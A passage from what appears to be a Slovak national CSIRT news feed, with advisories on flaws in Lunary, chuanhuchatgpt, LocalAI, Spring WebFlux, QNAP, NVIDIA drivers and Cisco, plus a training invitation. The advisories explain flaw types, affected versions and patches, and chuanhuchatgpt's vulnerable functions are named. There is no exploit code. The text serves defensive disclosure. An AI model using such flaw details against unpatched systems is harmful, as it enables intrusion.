<li>Lunary verzia 1.3.2</li>



<li>gaizhenbiao/chuanhuchatgpt verzia 20240628</li>



<li><span style="color:black"></span>Mudler/localai verzia 2.17.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-7474</strong> (CVSS skóre 9,1) a <strong>CVE-2024-7475</strong> (CVSS skóre 9,1)</p>



<p>Kritické zraniteľnosti sa nachádzajú v komponente <strong>Lunary</strong> a vznikajú z dôvodu <strong>nedostatočnej kontroly prístupu</strong>. Zraniteľnosť CVE-2024-7474 typu IDOR vzniká kvôli nedostatočnej kontrole prístupu na parameter používateľského ID v koncových bodoch API pre správu externých používateľov. Úspešné zneužitie <strong>(manipulácia s parametrom ID)</strong> umožňuje <strong>autentifikovanému útočníkovi získať kontrolu nad správou externých používateľov</strong>. Chyba CVE-2024-7475 umožňuje <strong>neautorizovanému útočníkovi aktualizovať konfiguráciu SAML</strong> (Security Assertion Markup Language), čo môže viesť k <strong>manipulácii s autentifikačnými procesmi, podvodným prihlasovacím požiadavkám a krádeži používateľských informácií</strong>. Útočník môže zraniteľnosť zneužiť odoslaním špeciálne vytvorenej požiadavky POST.</p>



<p><strong>CVE-2024-5982</strong> (CVSS skóre 9,1)</p>



<p>Kritická zraniteľnosť typu path traversal sa nachádza v komponente <strong>gaizhenbiao/chuanhuchatgpt</strong>. Chyba spočíva v nevhodnej <strong>sanitizácii používateľských vstupov, ktoré sú pripájané ku cestám k adresárom pomocou funkcie</strong> <em>os.path.join</em>. Tieto vstupy využíva viacero ďalších funkcií. Funkcia <em>load_chat_history</em> v súbore <em>modules/models/base_model.py</em> umožňuje nahrávanie ľubovoľných súborov, čo môže viesť k <strong>vzdialenému vykonávaniu kódu</strong>. V súbore <em>utils.py</em> umožňuje funkcia <em>get_history_names</em> v<strong>ytváranie ľubovoľných adresárov</strong> a funkcia pre nahrávanie šablón <em>load_template</em> dovoľuje získať hodnoty z prvého stĺpca CSV súborov.</p>



<p><strong>CVE-2024-6983</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť komponentu <strong>Mudler/localai</strong> umožňuje útočníkovi <strong>nahrať binárny súbor</strong> a <strong>spustiť škodlivý kód</strong>. Zraniteľnosť dovoľuje útočníkovi nahrať vlastný konfiguračný súbor, ktorý obsahuje odkaz na externý súbor. Tento si zraniteľná aplikácia stiahne a vykoná.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong><span style="font-size:11.0pt;font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:
minor-latin;mso-fareast-font-family:&quot;Times New Roman&quot;;mso-fareast-theme-font:
minor-fareast;mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;
color:black"></span>Prístup ku chráneným zdrojom</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verzie</p>



<ul>
<li>Lunary 1.3.4</li>



<li>gaizhenbiao/chuanhuchatgpt 20240918</li>



<li>Mudler/localai 2.19.4</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://protectai.com/threat-research/2024-october-vulnerability-report">https://protectai.com/threat-research/2024-october-vulnerability-report<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:
Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://sightline.protectai.com/vulnerabilities/a8580293-cbec-4e97-8b6f-aec2c557f8ea">https://sightline.protectai.com/vulnerabilities/a8580293-cbec-4e97-8b6f-aec2c557f8ea</a></li>



<li><a href="https://sightline.protectai.com/vulnerabilities/1a214947-6d8d-414f-b70e-a2392ad18549">https://sightline.protectai.com/vulnerabilities/1a214947-6d8d-414f-b70e-a2392ad18549</a></li>



<li><a href="https://sightline.protectai.com/vulnerabilities/2cbac1ac-2561-4f8e-8854-7022973f7422">https://sightline.protectai.com/vulnerabilities/2cbac1ac-2561-4f8e-8854-7022973f7422</a></li>



<li><a href="https://sightline.protectai.com/vulnerabilities/b182990f-02ea-49d0-9fad-61030cbe6460/assess">https://sightline.protectai.com/vulnerabilities/b182990f-02ea-49d0-9fad-61030cbe6460/assess</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7474">https://nvd.nist.gov/vuln/detail/CVE-2024-7474</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7475">https://nvd.nist.gov/vuln/detail/CVE-2024-7475</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-5982">https://nvd.nist.gov/vuln/detail/CVE-2024-5982</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6983">https://nvd.nist.gov/vuln/detail/CVE-2024-6983</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1626/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Spring WebFlux</title>
		<link>/posts/1613</link>
					<comments>/posts/1613#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 30 Oct 2024 15:35:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Spring]]></category>
		<category><![CDATA[WebFlux]]></category>
		<guid isPermaLink="false">/?p=1613</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/spring_webflux_logo-1024x628.png" alt="" /></p>Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť vo webovom frameworku Spring WebFlux. Bližšie nešpecifikovanú zraniteľnosť s označením...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/spring_webflux_logo-1024x628.png" alt="" /></p>
<p><strong>Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť vo webovom frameworku Spring WebFlux. Bližšie nešpecifikovanú zraniteľnosť s označením CVE-2024-38821 by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie bezpečnostných mechanizmov a narušenie dôvernosti a integrity systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Spring WebFlux 5.7.0 – 5.7.12, 5.8.0 – 5.8.14</li>



<li>Spring WebFlux 6.0.0 – 6.0.12, 6.1.0. – 6.1.10, 6.2.0 – 6.2.6, 6.3.0 – 6.3.3</li>



<li>Spring WebFlux staršie verzie (nepodporované)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-38821</strong> (CVSSv3.1 skóre 9,1)</p>



<p>Vývojári Spring Framework opravili kritickú zraniteľnosť v module Spring WebFlux, ktorá súvisí s možnosťou za istých nešpecifikovaných podmienok obchádzať pravidlá autorizácie „Spring Security“ pre statické zdroje v aplikáciách WebFlux. Pre jej úspešné zneužitie musí aplikácia využívať podporu statických zdrojov Spring a mať pre ňu nastavené autorizačné pravidlo „non-permitAll“.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neautorizovaný prístup ku zdrojom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verzie</p>



<ul>
<li>Spring WebFlux 5.7.13, 5.8.15</li>



<li>Spring WebFlux 6.0.13, 6.1.11, 6.2.7, 6.3.4</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://spring.io/security/cve-2024-38821">https://spring.io/security/cve-2024-38821</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-38821">https://www.cve.org/CVERecord?id=CVE-2024-38821</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1613/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produktoch QNAP HBS 3 Hybrid Backup Sync a SMB Service</title>
		<link>/posts/1592</link>
					<comments>/posts/1592#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 30 Oct 2024 10:30:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[QNAP]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1592</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>Spoločnosť QNAP vydala bezpečnostné aktualizácie svojho nástroja pre zálohovanie a obnovu dát HBS 3 (HYBRID BACKUP SYNC), ktoré opravujú kritickú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>
<p><strong>Spoločnosť QNAP vydala bezpečnostné aktualizácie svojho nástroja pre zálohovanie a obnovu dát HBS 3 (HYBRID BACKUP SYNC), ktoré opravujú kritickú zero-day zraniteľnosť. CVE-2024-50388 možno zneužiť na vzdialené vykonanie kódu. HBS 3 je používaný v rámci sieťových úložísk QNAP NAS s operačnými systémami QTS a QuTS hero. Aktualizácie opravujú tiež kritickú zero-day zraniteľnosť SMB Service, ktorá umožňuje útoky typu SQL injection a získanie kontroly nad zariadením.</strong><br><strong>[Aktualizované 31.10.2024]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>HBS 3 Hybrid Backup Sync vo verziách starších ako 25.1.1.673</li>



<li>SMB Service 4.15.x, SMB Service h4.15.x</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-50388</strong> (CVSS skóre 9,8)</p>



<p>Bližšie nešpecifikovanú kritickú zero-day zraniteľnosť HBS3 (HYBRID BACKUP SYNC) s označením CVE-2024-50388 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov a vykonanie kódu.<br><br><strong>CVE-2024-50387</strong> <br><br>Kritická zero-day zraniteľnosť  v komponente SMB Service, ktorý využívajú sieťové úložiská NAS, spočíva v nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu  SQL injekcie a získanie úplnej kontroly nad zariadením (prístupu k root shell).<br><br>Zraniteľnosti objavili účastníci hackerskej súťaže PWN2OWN IRELAND 2024.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené</strong> v<strong>ykonávanie kódu</strong></li>



<li><strong>Prevzatie kontroly nad zariadením</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Pre CVE-2024-50388 odporúča spoločnosť QNAP vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verziu 25.1.1.673 a vyššie. Presný postup môžete nájsť na <a href="https://www.qnap.com/en/security-advisory/qsa-24-41" data-type="link" data-id="https://www.qnap.com/en/security-advisory/qsa-24-41">stránke výrobcu</a>, v časti „Updating HBS 3 Hybrid Backu Sync“.</strong></p>



<p><strong>Pre CVE-2024-50387 odporúča výrobca <a href="https://www.qnap.com/en/security-advisory/qsa-24-42" data-type="link" data-id="https://www.qnap.com/en/security-advisory/qsa-24-42">aktualizovať SMB Service</a> aspoň na verziu 4.15.002 / h4.15.002.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.qnap.com/en/security-advisory/qsa-24-41">https://www.qnap.com/en/security-advisory/qsa-24-41</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/qnap-fixes-nas-backup-software-zero-day-exploited-at-pwn2own/">https://www.bleepingcomputer.com/news/security/qnap-fixes-nas-backup-software-zero-day-exploited-at-pwn2own/</a></li>



<li><a href="https://www.qnap.com/en/security-advisory/qsa-24-42">https://www.qnap.com/en/security-advisory/qsa-24-42</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/qnap-patches-second-zero-day-exploited-at-pwn2own-to-get-root/">https://www.bleepingcomputer.com/news/security/qnap-patches-second-zero-day-exploited-at-pwn2own-to-get-root/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1592/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Pozývame Vás do nášho Výcvikového a školiaceho strediska</title>
		<link>/posts/1589</link>
					<comments>/posts/1589#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 29 Oct 2024 15:09:22 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[cvičenie]]></category>
		<category><![CDATA[Kyberarena]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1589</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/skolenie-1024x585.jpeg" alt="" /></p>Ste organizácia štátnej alebo verejnej správy? Príďte na školenie v našom Výcvikovom a školiacom stredisku. Môžete sa zúčastniť vzdelávacej aktivity,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/skolenie-1024x585.jpeg" alt="" /></p>
<p><strong>Ste organizácia štátnej alebo verejnej správy? Príďte na školenie v našom Výcvikovom a školiacom stredisku. Môžete sa zúčastniť vzdelávacej aktivity, ktorá je navrhnutá tak, aby rozvinula vaše schopnosti v oblasti kybernetickej bezpečnosti a otestovala vás v oblasti detekcie hrozieb, reakcie na incidenty, obrany infraštruktúry, či zabezpečenia kontinuity prevádzky.</strong><br><br><strong>V našom školiacom stredisku vieme ponúknuť rôzne druhy školení, pripravené na mieru pre Vašu organizáciu.</strong></p>



<h2 class="wp-block-heading">Kyberaréna</h2>



<p>Kybernetické hrozby sa neustále vyvíjajú v ich soﬁstikovanosti a rozsahu. Prístup ku kybernetickej bezpečnosti organizácie je dôležitejší, ako nikdy predtým.<br><br>Školenie v kyberaréne ponúka dynamické prostredie, kde sa môžete zapojiť do viac ako 70 scenárov, ktorých riešením získate cenné poznatky o bezpečnostných nástrojoch a bezpečnostnej politike. V rámci tímu budete spolupracovať s kolegami na riešení komplexných výziev pri chránení infraštruktúry simulovanej organizácie a návrhoch bezpečnostných opatrení. Hlavným cieľom je rozvoj hard-skills, tímová kooperácia, reakcia na incidenty, procesy pri riešení incidentov a práca s bezpečnostnými nástrojmi.</p>



<ul>
<li>Blue team, Red team</li>



<li>5 rôznych prostredí infraštruktúry (landscapes)</li>



<li>70 scenárov z ktorých si môžu účastníci vyberať. (DDoS útok, brute force, SQL injection, zneužitie rôznych zraniteľností, malware/ransomware útoky a ďalšie&#8230;)</li>



<li>Nástroje – Zabbix/Elastic, F5, Palo Alto, EDR, Vulnerability skener a ďalšie&#8230;</li>
</ul>



<h2 class="wp-block-heading">Tabletop cvičenia</h2>



<p>Máte v organizácii nastavené procesy, ale ešte ste ich nemuseli aplikovať? Boli by ste pripravení, keby ste museli riešiť nárazovo mnoho krízových situácií? Tabletop sú cvičenia, na ktorých sa členovia tímu stretávajú v neformálnom, riadenom prostredí, aby riešili úlohy počas mimoriadnych udalostí a otestovať svoje reakcie na krízové situácie. Súčasťou cvičenia je mix 7 scenárov, ktoré si môžu používatelia zahrať.<br><br>Ako by ste reagovali pri cielenej a úspešnej phishingovej kampani, či zneužití mena vašej organizácie na dezinformačnú kampaň? Viete pracovať v tíme, rozdeliť si roly a dohodnúť sa za krátky čas na reakcii?<br>Cieľom školení je precvičiť si tímovú spoluprácu, kritické myslenie a schopnosť reagovať aj na bizarné situácie.</p>



<ul>
<li>Phishing</li>



<li>Dezinformácie</li>



<li>Riadenie kontinuity prevádzky</li>



<li>Sociálne inžinierstvo</li>
</ul>



<h2 class="wp-block-heading">Prečo sa zúčastniť školenia Kyberaréna?</h2>



<ul>
<li><strong>Interaktivita:</strong> Zabráňte útokom v simulovanom prostredí skôr, ako bude neskoro, zdokonaľte svoje schopnosti riešiť krízové situácie a získané poznatky využite pri zabezpečení infraštruktúry vlastnej organizácie.</li>



<li><strong>Prax:</strong> Konzultujte svoje kroky s ľuďmi, ktorí riešia kybernetické incidenty denne.</li>



<li><strong>Bezpečnostné nástroje:</strong> Vyskúšajte si a preskúmajte bezpečnostné nástroje predtým, ako ich nasadíte u seba.</li>
</ul>



<h2 class="wp-block-heading">Pre koho je školenie určené?</h2>



<p>Toto školenie je ideálne pre bezpečnostných profesionálov, IT manažérov, manažérov vo verejnej správe, analytikov SOC, správcov sietí a pre každého, kto sa zaujíma o ochranu digitálnych aktív.</p>



<h2 class="wp-block-heading">Rezervujte si svoje miesto už dnes!</h2>



<p>Vzhľadom na praktickú povahu školenia sú miesta obmedzené. Zabezpečte si svoje miesto registráciou tu: <a href="https://kyberarena.csirt.sk/registracia">https://kyberarena.csirt.sk/registracia</a><br><br>Tešíme sa na vašu účasť na tomto jedinečnom a podnetnom vzdelávacom zážitku. Spoločne budujme bezpečnejšiu digitálnu budúcnosť.<br><br>V prípade otázok alebo ďalších informácií nás prosím kontaktujte na <a href="mailto:vzdelavanie@csirt.sk">vzdelavanie@csirt.sk</a></p>



<p></p>



<p><strong>Našu pozvánku si môžete stiahnuť <a href="https://csirt.sk/wp-content/uploads/2024/10/Pozvanka_KA.pdf" data-type="link" data-id="/wp-content/uploads/2024/10/Pozvanka_KA.pdf">ako PDF</a>.</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1589/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>NVIDIA opravila závažné zraniteľnosti ovládačov</title>
		<link>/posts/1571</link>
					<comments>/posts/1571#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 25 Oct 2024 12:58:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NVIDIA]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1571</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Nvidia-Logo-700x394-1.png" alt="" /></p>Spoločnosť nVidia vydala bezpečnostné aktualizácie, ktoré opravujú viacero vysoko závažných zraniteľností v ovládačoch grafických kariet. Najzávažnejšiu zraniteľnosť s označením CVE‑2024‑0126...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Nvidia-Logo-700x394-1.png" alt="" /></p>
<p><strong>Spoločnosť nVidia vydala bezpečnostné aktualizácie, ktoré opravujú viacero vysoko závažných zraniteľností v ovládačoch grafických kariet. Najzávažnejšiu zraniteľnosť s označením CVE‑2024‑0126 by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií a vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GeForce, NVIDIA RTX, Quadro, NVS, Tesla – všetky ovládače pre <strong>Windows</strong> vo verziách starších ako 566.03, 553.24 a 538.95</li>



<li>GeForce, NVIDIA RTX, Quadro, NVS, Tesla – všetky ovládače pre <strong>Linux</strong> vo verziách starších ako 565.57.01, 550.127.05 a 535.216.01</li>



<li>vGPU – komponent Guest Driver 17.3, 16.7 a staršie, ovládač pre <strong>Windows</strong> 552.74 a 538.78 a <strong>Linux</strong>      550.90.07 a 535.183.06</li>



<li>vGPU – komponent Virtual GPU Manager 17.3, 16.7 a staršie, ovládače vo verziách 552.55, 550.90.05 a 535.183.04</li>



<li>Cloud Gaming – komponent Guest Driver September 2024 a staršie verzie, ovládač pre <strong>Windows</strong> 560.94 a <strong>Linux</strong> 560.35.03</li>



<li>Cloud Gaming – komponent Virtual GPU Manager September 2024 a staršie verzie, ovládač 560.35.03</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-0126</strong> (CVSS skóre 8,2): zraniteľnosť ovládačov NVIDIA GPU pre Windows a Linux umožňuje zvýšenie oprávnení lokálnemu privilegovanému útočníkovi.</p>



<p><strong>CVE-2024-0117, CVE-2024-0118, CVE-2024-0119, CVE-2024-0120, CVE-2024-0121</strong> (CVSS skóre 7,8): zraniteľnosti ovládačov NVIDIA GPU pre Windows v používateľskej vrstve umožňujú štandardnému používateľovi čítať obsah pamäte mimo povolené hodnoty.</p>



<p><strong>CVE-2024-0127</strong> (CVSS skóre 7,8): zraniteľnosť ovládača GPU v NVIDIA vGPU Manager umožňuje používateľovi hosťovského OS spôsobiť nevhodnú validáciu vstupov.</p>



<p><strong>CVE-2024-0128</strong> (CVSS skóre 7,1): zraniteľnosť NVIDIA vGPU Manager umožňuje používateľovi hosťovského OS prístup ku globálnym prostriedkom.</p>



<p>Úspešným zneužitím zraniteľností môžu útočníci získať schopnosť vykonávať kód, zneprístupniť služby, eskalovať svoje privilégiá a získať neoprávnený prístup k citlivým údajom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vykonávanie kódu</strong></li>



<li><strong>Zneprístupnenie služby (DoS)<span style="font-family:&quot;Calibri&quot;,sans-serif;mso-ascii-theme-font:minor-latin;
mso-hansi-theme-font:minor-latin;mso-bidi-theme-font:minor-latin;color:black;
mso-bidi-font-weight:normal"></span></strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia <a href="https://www.nvidia.com/Download/index.aspx" data-type="link" data-id="https://www.nvidia.com/Download/index.aspx">ovládačov</a> GeForce, NVIDIA RTX, Quadro, NVS a Tesla:</p>



<ul>
<li>pre <strong>Windows</strong> aspoň na verzie 566.03, 553.24 a 538.95</li>



<li>pre <strong>Linux</strong> aspoň na verzie 565.57.01, 550.127.05 a 535.216.01</li>



<li>vGPU – komponent Guest Driver 17.4, 16.8, ovládač pre <strong>Windows</strong> 553.24 a 538.95 a <strong>Linux</strong> 550.127.05 a 535.216.01</li>



<li>vGPU – komponent Virtual GPU Manager 17.4, 16.8, ovládače 553.20, 550.127.06 a 535.216.01</li>



<li>Cloud Gaming – komponent Guest Driver October 2024, ovládač pre <strong>Windows</strong> 566.03 a <strong>Linux</strong> 565.57.01</li>



<li>Cloud Gaming – komponent Virtual GPU Manager October 2024, ovládač 565.57.01</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5586">https://nvidia.custhelp.com/app/answers/detail/a_id/5586</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1571/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Strašidelné štatistiky v roku 2024 [Infografika]</title>
		<link>/posts/1561</link>
					<comments>/posts/1561#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 25 Oct 2024 11:26:12 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Infografika]]></category>
		<guid isPermaLink="false">/?p=1561</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>S blížiacim sa Halloweenom vám prinášame &#8220;desivé&#8221; fakty z oblasti kybernetickej bezpečnosti. V roku 2024 čelíme nárastu kybernetických hrozieb, ktoré...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>S blížiacim sa Halloweenom vám prinášame &#8220;desivé&#8221; fakty z oblasti  kybernetickej bezpečnosti. V roku 2024 čelíme nárastu  kybernetických hrozieb, ktoré sú strašidelnejšie než kedykoľvek predtým. Ransomvér, phishing a rôzne iné útoky dosahujú rekordné čísla. Pozrite si našu infografiku, ktorá odhalí, aké &#8220;príšery&#8221; číhajú v online  priestore. Nezabudnite, že kybernetická bezpečnosť nie je len o technológiách, ale  aj o vašom správaní na internete. </p>



<p><em><a href="https://csirt.sk/wp-content/uploads/2024/10/Infografika-halloween.pdf" data-type="link" data-id="/wp-content/uploads/2024/10/Infografika-halloween.pdf">Infografika- Strašidelné štatistiky 2024</a> (PDF)</em></p>



<p>Všetky naše infografiky si môžete pozrieť <a href="https://csirt.sk/infografiky" data-type="link" data-id="/infografiky">tu</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1561/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti produktov Cisco</title>
		<link>/posts/1555</link>
					<comments>/posts/1555#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Oct 2024 15:29:45 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1555</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco opravila kritické zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti Cisco Secure Firewall Management Center a Adaptive Security Appliance umožňujú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco opravila kritické zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti Cisco Secure Firewall Management Center a Adaptive Security Appliance umožňujú vykonávanie ľubovoľných systémových príkazov s oprávneniami používateľa root. Zraniteľnosť Firepower Threat Defense súvisí s prítomnosťou prihlasovacích údajov v kóde systému a umožňuje tak neoprávnený prístup do systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Všetky produkty, na ktorých beží zraniteľná verzia Cisco FMC</li>



<li>Všetky produkty, na ktorých beží zraniteľná verzia Cisco ASA, majú povolené CiscoSSH a povolený      prístup cez SSH na niektorom rozhraní</li>



<li>Cisco Firepower série 1000, 2100, 3100 a 4200, ktoré využívajú Cisco FTD verzie 7.1 až 7.4 s databázou zraniteľností (VDB) verzie 387 a staršej</li>
</ul>



<p><em>Zraniteľnosť svojho zariadenia si môžete overiť <a href="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x" data-type="link" data-id="https://sec.cloudapps.cisco.com/security/center/softwarechecker.x">nástrojom</a> spoločnosti Cisco.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-20329</strong> (CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť Cisco Adaptive Security Appliance vo funkcionalite pre komunikáciu cez SSH, ktorá spočíva v nedostatočnom overovaní používateľských vstupov. Autentifikovaný vzdialený útočník s nízkymi oprávneniami môže odoslaním špeciálne vytvoreného vstupu v SSH konzole vykonávať ľubovoľné príkazy v operačnom systéme s oprávneniami používateľa root.</p>



<p><strong>CVE-2024-20424</strong> (CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť vo webovom manažmentovom rozhraní Cisco Secure Firewall Management Center, ktorá spočíva v nedostatočnom overovaní vstupov niektorých HTTP požiadaviek. Autentifikovaný vzdialený útočník s rolou aspoň Security Analyst (Read Only) môže vykonávať ľubovoľné príkazy s oprávneniami používateľa root na hostiteľskom systéme alebo príkazy na zariadeniach Firepower Threat Defense.</p>



<p><strong>CVE-2024-20412 </strong>(CVSS skóre 9,3)</p>



<p>Kritická zraniteľnosť Cisco Firepower Threat Defense pre Firepower 1000, 2100, 3100 a 4200, ktorá súvisí s prítomnosťou statických účtov s heslami prítomnými v kóde softvéru. Lokálny neautentifikovaný útočník môže získať prístup k týmto prihlasovacím údajom, a tak získať prístup do zraniteľného systému. Následne môže získať prístup k citlivým informáciám, vykonávať konfiguračné zmeny a zamedziť zariadeniu, aby naštartovalo.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľných príkazov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia produktov Cisco.</p>



<p>Zraniteľnosť CVE-2024-20329 môžete <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF" data-type="link" data-id="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF">mitigovať</a> zakázaním CiscoSSH a jeho nahradením natívnou implementáciou SSH.</p>



<p>Spoločnosť Cisco poskytuje <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5" data-type="link" data-id="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-statcred-dFC8tXT5">mitigáciu</a> aj pre zraniteľnosť CVE-2024-20412, bez špecifikácie podrobností. Taktiež uverejnila návod pre overenie potenciálnej kompromitácie.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7</a></li>



